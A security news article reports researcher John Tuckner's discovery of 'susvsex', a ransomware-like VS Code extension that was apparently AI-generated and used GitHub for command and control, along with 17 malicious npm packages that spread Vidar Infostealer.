Cybersecurity researchers have identified a malicious Visual Studio Code (VS Code) extension with ransomware-like capabilities, allegedly created using artificial intelligence, signaling a new wave of “vibe-coded” malware. The extension, named “susvsex,” was discovered by Secure Annex researcher John Tuckner, who noted that the tool makes no attempt to disguise its harmful behavior.
Uploaded on November 5, 2025, by a user identified as “suspublisher18”, the extension’s description openly stated: “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” The listing included the description “Just testing” and a non-functional email address. Microsoft has since removed the extension from the official VS Code Marketplace.
According to Tuckner, the extension was programmed to activate automatically upon installation or launch, invoking a function called “zipUploadAndEncrypt.” This function compressed files from a target directory, exfiltrated them to a remote server, and replaced them with encrypted versions. “Fortunately, the TARGET_DIRECTORY is configured to be a test staging directory so it would have little impact right now, but is easily updated with an extension release or as a command sent through the C2 channel covered next,” Tuckner explained.
In addition to encryption, the malicious extension leveraged GitHub as its command-and-control (C2) infrastructure. It used a private repository to receive commands from the attacker and sent back execution results using a GitHub token embedded within the code. The repository was linked to a user named “aykhanmv” from Baku, Azerbaijan, whose account remains active.
Tuckner further noted that the extension contained several telltale signs of AI-generated code: “Extraneous comments which detail functionality, README files with execution instructions, and placeholder variables are clear signs of ‘vibe coded’ malware.” The package also mistakenly included decryption tools, C2 server code, and GitHub access keys, potentially allowing others to hijack the control server.
The discovery coincides with a separate finding from Datadog Security Labs, which uncovered 17 malicious npm packages spreading Vidar Infostealer. The packages, uploaded between October 21 and 26, 2025, mimicked legitimate SDKs but executed malicious post-install scripts that downloaded malware from external servers.
The incidents underscore the growing risk of AI-assisted malware development and the persistent threat of supply chain attacks across open-source ecosystems like npm, PyPI, RubyGems, and Open VSX. Researchers urge developers to remain vigilant, verify sources, and scrutinize dependencies to prevent compromise.
 extension with ransomware-like capabilities, allegedly.....){kind=link}